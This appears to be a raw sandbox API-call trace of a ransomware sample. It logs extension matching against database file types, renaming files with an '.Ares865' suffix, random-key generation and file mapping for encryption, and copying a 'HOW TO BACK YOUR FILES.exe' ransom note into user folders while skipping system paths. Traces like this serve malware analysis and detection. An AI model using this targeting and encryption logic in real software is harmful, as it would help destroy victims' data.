(lpString1="lnk", lpString2="gdb") returned 1 [0057.475] lstrlenW (lpString="gdb") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="gdb") returned 1 [0057.475] lstrlenW (lpString="grdb") returned 4 [0057.475] lstrcmpiW (lpString1=".lnk", lpString2="grdb") returned -1 [0057.475] lstrlenW (lpString="gwi") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="gwi") returned 1 [0057.475] lstrlenW (lpString="hdb") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="hdb") returned 1 [0057.475] lstrlenW (lpString="his") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="his") returned 1 [0057.475] lstrlenW (lpString="ib") returned 2 [0057.475] lstrcmpiW (lpString1="nk", lpString2="ib") returned 1 [0057.475] lstrlenW (lpString="idb") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="idb") returned 1 [0057.475] lstrlenW (lpString="ihx") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="ihx") returned 1 [0057.475] lstrlenW (lpString="itdb") returned 4 [0057.475] lstrcmpiW (lpString1=".lnk", lpString2="itdb") returned -1 [0057.475] lstrlenW (lpString="itw") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="itw") returned 1 [0057.475] lstrlenW (lpString="jet") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="jet") returned 1 [0057.475] lstrlenW (lpString="jtx") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="jtx") returned 1 [0057.475] lstrlenW (lpString="kdb") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="kdb") returned 1 [0057.475] lstrlenW (lpString="kexi") returned 4 [0057.475] lstrcmpiW (lpString1=".lnk", lpString2="kexi") returned -1 [0057.475] lstrlenW (lpString="kexic") returned 5 [0057.475] lstrcmpiW (lpString1="x.lnk", lpString2="kexic") returned 1 [0057.475] lstrlenW (lpString="kexis") returned 5 [0057.475] lstrcmpiW (lpString1="x.lnk", lpString2="kexis") returned 1 [0057.475] lstrlenW (lpString="lgc") returned 3 [0057.475] lstrcmpiW (lpString1="lnk", lpString2="lgc") returned 1 [0057.476] lstrlenW (lpString="lwx") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="lwx") returned -1 [0057.476] lstrlenW (lpString="maf") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="maf") returned -1 [0057.476] lstrlenW (lpString="maq") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="maq") returned -1 [0057.476] lstrlenW (lpString="mar") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mar") returned -1 [0057.476] lstrlenW (lpString="marshal") returned 7 [0057.476] lstrcmpiW (lpString1="fox.lnk", lpString2="marshal") returned -1 [0057.476] lstrlenW (lpString="mas") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mas") returned -1 [0057.476] lstrlenW (lpString="mav") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mav") returned -1 [0057.476] lstrlenW (lpString="maw") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="maw") returned -1 [0057.476] lstrlenW (lpString="mdbhtml") returned 7 [0057.476] lstrcmpiW (lpString1="fox.lnk", lpString2="mdbhtml") returned -1 [0057.476] lstrlenW (lpString="mdn") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mdn") returned -1 [0057.476] lstrlenW (lpString="mdt") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mdt") returned -1 [0057.476] lstrlenW (lpString="mfd") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mfd") returned -1 [0057.476] lstrlenW (lpString="mpd") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mpd") returned -1 [0057.476] lstrlenW (lpString="mrg") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mrg") returned -1 [0057.476] lstrlenW (lpString="mud") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mud") returned -1 [0057.476] lstrlenW (lpString="mwb") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="mwb") returned -1 [0057.476] lstrlenW (lpString="myd") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="myd") returned -1 [0057.476] lstrlenW (lpString="ndf") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="ndf") returned -1 [0057.476] lstrlenW (lpString="nnt") returned 3 [0057.476] lstrcmpiW (lpString1="lnk", lpString2="nnt") returned -1 [0057.477] lstrlenW (lpString="nrmlib") returned 6 [0057.477] lstrcmpiW (lpString1="ox.lnk", lpString2="nrmlib") returned 1 [0057.477] lstrlenW (lpString="ns2") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="ns2") returned -1 [0057.477] lstrlenW (lpString="ns3") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="ns3") returned -1 [0057.477] lstrlenW (lpString="ns4") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="ns4") returned -1 [0057.477] lstrlenW (lpString="nsf") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="nsf") returned -1 [0057.477] lstrlenW (lpString="nv") returned 2 [0057.477] lstrcmpiW (lpString1="nk", lpString2="nv") returned -1 [0057.477] lstrlenW (lpString="nv2") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="nv2") returned -1 [0057.477] lstrlenW (lpString="nwdb") returned 4 [0057.477] lstrcmpiW (lpString1=".lnk", lpString2="nwdb") returned -1 [0057.477] lstrlenW (lpString="nyf") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="nyf") returned -1 [0057.477] lstrlenW (lpString="odb") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0057.477] lstrlenW (lpString="odb") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="odb") returned -1 [0057.477] lstrlenW (lpString="oqy") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="oqy") returned -1 [0057.477] lstrlenW (lpString="ora") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="ora") returned -1 [0057.477] lstrlenW (lpString="orx") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="orx") returned -1 [0057.477] lstrlenW (lpString="owc") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="owc") returned -1 [0057.477] lstrlenW (lpString="p96") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="p96") returned -1 [0057.477] lstrlenW (lpString="p97") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="p97") returned -1 [0057.477] lstrlenW (lpString="pan") returned 3 [0057.477] lstrcmpiW (lpString1="lnk", lpString2="pan") returned -1 [0057.477] lstrlenW (lpString="pdb") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="pdb") returned -1 [0057.478] lstrlenW (lpString="pdm") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="pdm") returned -1 [0057.478] lstrlenW (lpString="pnz") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="pnz") returned -1 [0057.478] lstrlenW (lpString="qry") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="qry") returned -1 [0057.478] lstrlenW (lpString="qvd") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="qvd") returned -1 [0057.478] lstrlenW (lpString="rbf") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="rbf") returned -1 [0057.478] lstrlenW (lpString="rctd") returned 4 [0057.478] lstrcmpiW (lpString1=".lnk", lpString2="rctd") returned -1 [0057.478] lstrlenW (lpString="rod") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="rod") returned -1 [0057.478] lstrlenW (lpString="rodx") returned 4 [0057.478] lstrcmpiW (lpString1=".lnk", lpString2="rodx") returned -1 [0057.478] lstrlenW (lpString="rpd") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="rpd") returned -1 [0057.478] lstrlenW (lpString="rsd") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="rsd") returned -1 [0057.478] lstrlenW (lpString="sas7bdat") returned 8 [0057.478] lstrcmpiW (lpString1="efox.lnk", lpString2="sas7bdat") returned -1 [0057.478] lstrlenW (lpString="sbf") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="sbf") returned -1 [0057.478] lstrlenW (lpString="scx") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="scx") returned -1 [0057.478] lstrlenW (lpString="sdb") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="sdb") returned -1 [0057.478] lstrlenW (lpString="sdc") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="sdc") returned -1 [0057.478] lstrlenW (lpString="sdf") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="sdf") returned -1 [0057.478] lstrlenW (lpString="sis") returned 3 [0057.478] lstrcmpiW (lpString1="lnk", lpString2="sis") returned -1 [0057.478] lstrlenW (lpString="spq") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="spq") returned -1 [0057.479] lstrlenW (lpString="te") returned 2 [0057.479] lstrcmpiW (lpString1="nk", lpString2="te") returned -1 [0057.479] lstrlenW (lpString="teacher") returned 7 [0057.479] lstrcmpiW (lpString1="fox.lnk", lpString2="teacher") returned -1 [0057.479] lstrlenW (lpString="tmd") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="tmd") returned -1 [0057.479] lstrlenW (lpString="tps") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="tps") returned -1 [0057.479] lstrlenW (lpString="trc") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0057.479] lstrlenW (lpString="trc") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="trc") returned -1 [0057.479] lstrlenW (lpString="trm") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="trm") returned -1 [0057.479] lstrlenW (lpString="udb") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="udb") returned -1 [0057.479] lstrlenW (lpString="udl") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="udl") returned -1 [0057.479] lstrlenW (lpString="usr") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="usr") returned -1 [0057.479] lstrlenW (lpString="v12") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="v12") returned -1 [0057.479] lstrlenW (lpString="vis") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="vis") returned -1 [0057.479] lstrlenW (lpString="vpd") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="vpd") returned -1 [0057.479] lstrlenW (lpString="vvv") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="vvv") returned -1 [0057.479] lstrlenW (lpString="wdb") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="wdb") returned -1 [0057.479] lstrlenW (lpString="wmdb") returned 4 [0057.479] lstrcmpiW (lpString1=".lnk", lpString2="wmdb") returned -1 [0057.479] lstrlenW (lpString="wrk") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="wrk") returned -1 [0057.479] lstrlenW (lpString="xdb") returned 3 [0057.479] lstrcmpiW (lpString1="lnk", lpString2="xdb") returned -1 [0057.480] lstrlenW (lpString="xld") returned 3 [0057.480] lstrcmpiW (lpString1="lnk", lpString2="xld") returned -1 [0057.480] lstrlenW (lpString="xmlff") returned 5 [0057.480] lstrcmpiW (lpString1="x.lnk", lpString2="xmlff") returned -1 [0057.480] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.Ares865") returned 51 [0057.480] MoveFileExW (lpExistingFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk"), lpNewFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.Ares865" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.ares865"), dwFlags=0x1) returned 1 [0057.493] CreateFileW (lpFileName="C:\\Users\\Public\\Desktop\\Mozilla Firefox.lnk.Ares865" (normalized: "c:\\users\\public\\desktop\\mozilla firefox.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0057.493] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1157) returned 1 [0057.493] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0057.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0057.494] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0057.494] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0057.495] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0057.495] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.495] CreateFileMappingW (hFile=0x15c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x790, lpName=0x0) returned 0x164 [0057.495] MapViewOfFile (hFileMappingObject=0x164, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x790) returned 0x190000 [0057.495] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0057.496] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0057.496] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0057.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2fe0 [0057.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2fe0 | out: hHeap=0x2b0000) returned 1 [0057.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0057.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0057.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0057.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0057.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d5ee0 [0057.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0057.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d5ee0 | out: hHeap=0x2b0000) returned 1 [0057.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0057.496] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0057.497] CloseHandle (hObject=0x164) returned 1 [0057.497] CloseHandle (hObject=0x15c) returned 1 [0057.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0057.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0057.498] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0a09a40, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb0a09a40, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb0a09a40, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x485, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Mozilla Firefox.lnk", cAlternateFileName="MOZILL~1.LNK")) returned 0 [0057.498] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0057.498] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e79d0 [0057.498] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User", iMaxLength=260 | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0057.498] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecfb0 | out: hHeap=0x2b0000) returned 1 [0057.499] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e79c8 | out: hHeap=0x2b0000) returned 1 [0057.499] lstrlenW (lpString="C:\\Users\\Default User") returned 21 [0057.499] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User" | out: lpString1="C:\\Users\\Default User") returned="C:\\Users\\Default User" [0057.499] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.499] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\how to back your files.exe"), bFailIfExists=1) returned 0 [0057.499] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0057.499] GetLastError () returned 0x0 [0057.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0057.500] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0057.500] CloseHandle (hObject=0x118) returned 1 [0057.500] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0057.500] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.500] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49aeaa40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49aeaa40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0057.500] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.500] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.500] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.500] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x49aeaa40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x49aeaa40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.501] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.501] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0057.501] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.501] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.501] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4b246220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b246220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="aoldtz.exe") returned 1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2=".") returned 1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="..") returned 1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="windows") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="bootmgr") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="temp") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="pagefile.sys") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="boot") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="ids.txt") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="ntuser.dat") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="perflogs") returned -1 [0057.501] lstrcmpiW (lpString1="AppData", lpString2="MSBuild") returned -1 [0057.501] lstrlenW (lpString="AppData") returned 7 [0057.501] lstrlenW (lpString="C:\\Users\\Default User\\*") returned 23 [0057.501] lstrcpyW (in: lpString1=0x2cce42c, lpString2="AppData" | out: lpString1="AppData") returned="AppData" [0057.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e79c8 [0057.501] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3c) returned 0x2e6090 [0057.501] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e79d0 | out: ListHead=0x2e7710, ListEntry=0x2e79d0) returned 0x2e79b0 [0057.501] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="aoldtz.exe") returned 1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2=".") returned 1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="..") returned 1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="windows") returned -1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="bootmgr") returned -1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="temp") returned -1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="pagefile.sys") returned -1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="boot") returned -1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="ids.txt") returned -1 [0057.501] lstrcmpiW (lpString1="Application Data", lpString2="ntuser.dat") returned -1 [0057.502] lstrcmpiW (lpString1="Application Data", lpString2="perflogs") returned -1 [0057.502] lstrcmpiW (lpString1="Application Data", lpString2="MSBuild") returned -1 [0057.502] lstrlenW (lpString="Application Data") returned 16 [0057.502] lstrlenW (lpString="C:\\Users\\Default User\\AppData") returned 29 [0057.502] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Application Data" | out: lpString1="Application Data") returned="Application Data" [0057.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7ba8 [0057.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x4e) returned 0x2ed8a0 [0057.502] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bb0 | out: ListHead=0x2e7710, ListEntry=0x2e7bb0) returned 0x2e79d0 [0057.502] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4b187b40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4b187b40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="aoldtz.exe") returned 1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2=".") returned 1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="..") returned 1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="windows") returned -1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="bootmgr") returned 1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="temp") returned -1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="pagefile.sys") returned -1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="boot") returned 1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="ids.txt") returned -1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="ntuser.dat") returned -1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="perflogs") returned -1 [0057.502] lstrcmpiW (lpString1="Contacts", lpString2="MSBuild") returned -1 [0057.502] lstrlenW (lpString="Contacts") returned 8 [0057.502] lstrlenW (lpString="C:\\Users\\Default User\\Application Data") returned 38 [0057.502] lstrcpyW (in: lpString1=0x2cce42c, lpString2="Contacts" | out: lpString1="Contacts") returned="Contacts" [0057.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7be8 [0057.502] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3e) returned 0x2e6240 [0057.502] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7bf0 | out: ListHead=0x2e7710, ListEntry=0x2e7bf0) returned 0x2e7bb0 [0057.502] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x306dce32, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x306dce32, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x306dce32, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0057.502] lstrcmpiW (lpString1="Cookies", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.502] lstrcmpiW (lpString1="Cookies", lpString2="aoldtz.exe") returned 1 [0057.502] lstrcmpiW (lpString1="Cookies", lpString2=".") returned 1 [0057.502] lstrcmpiW (lpString1="Cookies", lpString2="..") returned 1 [0057.502] lstrcmpiW (lpString1="Cookies", lpString2="windows") returned -1 [0057.502] lstrcmpiW (lpString1="Cookies", lpString2="bootmgr") returned 1 [0057.502] lstrcmpiW (lpString1="Cookies", lpString2="temp") returned -1 [0057.503] lstrcmpiW (lpString1="Cookies", lpString2="pagefile.sys") returned -1 [0057.503] lstrcmpiW (lpString1="Cookies", lpString2="boot") returned 1 [0057.503] lstrcmpiW (lpString1="Cookies", lpString2="ids.txt") returned -1 [0057.503] 